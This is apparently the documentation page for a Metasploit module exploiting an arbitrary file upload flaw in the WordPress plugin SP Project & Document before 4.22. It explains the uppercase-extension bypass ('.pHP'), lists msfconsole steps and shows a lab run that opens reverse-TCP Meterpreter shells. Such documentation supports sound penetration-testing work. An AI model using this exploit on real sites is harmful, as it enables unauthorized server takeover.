## Vulnerable Application

### Description

This module allows an attacker with a privileged Wordpress account to launch a reverse shell
due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22.
The security check only searches for lowercase file extensions such as `.php`, making it possible to upload `.pHP` files for instance.
Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/my_payload.php`

### Installation

You can easily install Wordpress with Docker as explained [there]
(https://upcloud.com/community/tutorials/wordpress-with-docker/).
Then, you can download a vulnerable version of SP Project & Document plugin from [here]
(https://downloads.wordpress.org/plugin/sp-client-document-manager.4.21.zip)
and install it on your Wordpress website through the plugin page : Add New > Upload Plugin > Browse...

## Verification Steps


1. Start `msfconsole`
2. `use exploit/multi/http/wordpress_plugin_sp_project_document_rce`
3. `set USERNAME <admin_username>`
4. `set PASSWORD <admin_password>`
5. `set TARGETURI <base_path_wordpress>` if the base path of the Wordpress website is different from `/`
6. `check` to check if the targeted Wordpress website is vulnerable
7. `run` the module to exploit the vulnerability and start a reverse shell

## Options

### USERNAME

Set the USERNAME of your admin account.

### PASSWORD

Set the PASSWORD of your admin account.

## Scenarios

This module was successfully tested on Debian 10 with Wordpress 5.7.2 and SP Project & Document 4.21.
See the following output :

```
msf6 > use wordpress_plugin_sp_project_document_manager
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(wordpress_plugin_sp_project_document_manager) > set rhost 192.168.1.35
rhost => 192.168.1.35
msf6 exploit(wordpress_plugin_sp_project_document_manager) > set username admin
username => admin
msf6 exploit(wordpress_plugin_sp_project_document_manager) > set password your_best_password
password => your_best_password
msf6 exploit(wordpress_plugin_sp_project_document_manager) > run

[*] Started reverse TCP handler on 192.168.1.28:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Version 4.21 of plugin SP Project & Document Manager found !
[+] The target is vulnerable. This version of SP Project & Document Manager is vulnerable !
[*] Uploading file 'ejtfh.pHP' containing the payload...
[*] Sending stage (39282 bytes) to 192.168.1.35
[*] Meterpreter session 4 opened (192.168.1.28:4444 -> 192.168.1.35:59938) at 2021-07-09 11:41:25 +0200
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to 192.168.1.35
[*] Meterpreter session 5 opened (192.168.1.28:4444 -> 192.168.1.35:59940) at 2021-07-09 11:41:45 +0200

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo 
Computer    : 217a92584fbf
OS          : Linux 217a92584fbf 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
Meterpreter : php/linux
meterpreter > 
```
